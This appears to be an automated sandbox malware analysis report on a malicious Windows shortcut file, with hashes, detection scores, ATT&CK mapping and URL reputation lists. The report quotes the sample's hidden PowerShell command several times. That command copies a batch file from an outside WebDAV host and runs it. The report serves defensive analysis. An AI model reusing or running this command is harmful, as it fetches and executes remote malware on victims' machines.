Windows Analysis Report
dial2%20(2).Ink.lnk

Overview

General Information

Sample name: dial2%20(2).Ink.lnk
Analysis ID: 1447087
MD5: 45e87e98e99ea69c34b4636c8e085e16
SHA1: 2a7ab675507ce0dcd0639f07bdacec2f3718b3d1
SHA256: fa39116396d122c184476400edd9c0995ad5c7a8976d6cfba95fa3cb258767dc
Tags: lnk

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 1244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", ProcessId: 1244, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", ProcessId: 1244, ProcessName: powershell.exe
No Snort rule has matched

AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: dial2%20(2).Ink.lnk; ReversingLabs: Detection: 18%
Source: dial2%20(2).Ink.lnk; Virustotal: Detection: 21%
Source: dial2%20(2).Ink.lnk; Joe Sandbox ML: detected
Source: Binary string: System.Management.Automation.pdbb/ source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb$ source: powershell.exe, 00000003.00000002.1326645552.000002202F58F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.1326645552.000002202F4B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbhI source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4 source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbEI source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbe35N source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.1323560124.000002202751E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1323560124.0000022027661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1303535300.00000220174B1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1303535300.00000220174B1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1323560124.000002202751E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1323560124.0000022027661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
Source: dial2%20(2).Ink.lnk; String found in binary or memory: https://pizza-practices-representative-country.trycloudflare.com
Source: dial2%20(2).Ink.lnk; String found in binary or memory: https://pizza-practices-representative-country.trycloudflare.com.Z2

System Summary

Source: Initial file; Strings: https://pizza-practices-representative-country.trycloudflare.com.Z2SXT=
Source: classification engine; Classification label: mal76.rans.winLNK@2/5@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nwmizi4.mvm.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FF8883E09CD push E85DAB5Dh; ret 3_2_00007FF8883E09F9

Persistence and Installation Behavior

Source: LNK file; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX (reported 75 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (reported 4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation (reported 4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (reported 4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
MITRE ATT&CK Matrix (one line per tactic; a technique followed by a count in parentheses was matched by that many signatures in this analysis):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: PowerShell (1); Scheduled Task/Job; At; Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (21); Process Injection (1); DLL Side-Loading (1); Obfuscated Files or Information (1); Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Process Discovery (11); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Antivirus detection for the submitted file (Source | Detection | Scanner | Label):
dial2%20(2).Ink.lnk | 18% | ReversingLabs | Binary.Trojan.Boxter
dial2%20(2).Ink.lnk | 22% | Virustotal |
dial2%20(2).Ink.lnk | 100% | Joe Sandbox ML |
No Antivirus matches
URL detection (Source | Detection | Scanner | Label):
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
https://pizza-practices-representative-country.trycloudflare.com.Z2 | 0% | Avira URL Cloud | safe
https://pizza-practices-representative-country.trycloudflare.com | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://pizza-practices-representative-country.trycloudflare.com | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
No contacted domains info
URLs found in memory dumps and in the sample (Name, Source, Malicious, Antivirus Detection, Reputation):

http://nuget.org/NuGet.exe
  • Source: powershell.exe, 00000003.00000002.1323560124.000002202751E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1323560124.0000022027661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

http://www.apache.org/licenses/LICENSE-2.0
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

https://pizza-practices-representative-country.trycloudflare.com
  • Source: dial2%20(2).Ink.lnk
  • Malicious: true
  • Antivirus detection: Virustotal: 0%; Avira URL Cloud: safe
  • Reputation: unknown

http://pesterbdd.com/images/Pester.png
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: true
  • Antivirus detection: URL Reputation: malware
  • Reputation: unknown

https://pizza-practices-representative-country.trycloudflare.com.Z2
  • Source: dial2%20(2).Ink.lnk
  • Malicious: true
  • Antivirus detection: Avira URL Cloud: safe
  • Reputation: unknown

http://www.apache.org/licenses/LICENSE-2.0.html
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

https://contoso.com/
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

https://nuget.org/nuget.exe
  • Source: powershell.exe, 00000003.00000002.1323560124.000002202751E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1323560124.0000022027661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

https://contoso.com/License
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

https://contoso.com/Icon
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

https://oneget.orgX
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

https://aka.ms/pscore68
  • Source: powershell.exe, 00000003.00000002.1303535300.00000220174B1000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  • Source: powershell.exe, 00000003.00000002.1303535300.00000220174B1000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown

https://github.com/Pester/Pester
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: Virustotal: 1%; Avira URL Cloud: safe
  • Reputation: unknown

https://oneget.org
  • Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmp
  • Malicious: false
  • Antivirus detection: URL Reputation: safe
  • Reputation: unknown
No contacted IP infos
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1447087
Start date and time: 2024-05-24 11:02:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: dial2%20(2).Ink.lnk
Detection: MAL
Classification: mal76.rans.winLNK@2/5@0/0
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 3
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .lnk
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 1244 because it is empty
  • Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
05:03:02 | API Interceptor | 7x Sleep call for process: powershell.exe modified
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllultnxj:NllU
MD5: F93358E626551B46E6ED5A0A9D29BD51
SHA1: 9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
SHA-256: 0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
SHA-512: D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e................................................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 4578
Entropy (8bit): 3.771645922767482
Encrypted: false
SSDEEP: 48:NlxN1zv/AQlUWTSogZoiNkP/AQlKTSogZoiNQ1:Nll/AQkHlNy/AQ3HlNi
MD5: 2845D3DA589EDD181DAD7D2614461CF3
SHA1: 0ADC5AF856BABFC08DA4E6345BB6ED912EEEECD9
SHA-256: 580000DC87D3B202B4A79296AC94C5B8911B472B087C6EF28F81050600A17FDC
SHA-512: F93291708CA4C05E995C93A8F4167BFDC43E4B5B658F10CC9583C54E62D095F859262737BADA20227819EDA5B173ACE3C18E634540D862191392662D9D8C613D
Malicious: false
Reputation: low
Preview:...................................FL..................F. .. .....l.....M-......,.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........DDj.....1.l...iQP-......t.2......X`H .DIAL2%~1.LNK..X......EW.J.X`H...........................U..d.i.a.l.2.%.2.0.(.2.)...I.n.k...l.n.k.......X...............-.......W...........NL.t.....C:\Users\user\Desktop\dial2%20(2).Ink.lnk..'.\.\.d.i.a.t.r.u.i.e.s.t...c.o.m.@.8.0.\.s.n.i.p.t.o.o.l.\.w.o.r.k.\.a...i.c.o.`.......X.......124406...........hT..CrF.f4... .k.E._c...,...E...hT..CrF.f4... .k.E._c...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3.8l....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.J..Windows.@......OwH.X`H....3.........................W.i.n.d.o.w.s.....Z.1......XZH..System32..B......OwH.X\
File type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06 2018, length=446976, window=hidenormalshowminimized
Entropy (8bit): 4.571668912155042
TrID:
  • Windows Shortcut (20020/1) 100.00%
File name: dial2%20(2).Ink.lnk
File size: 2'247 bytes
MD5: 45e87e98e99ea69c34b4636c8e085e16
SHA1: 2a7ab675507ce0dcd0639f07bdacec2f3718b3d1
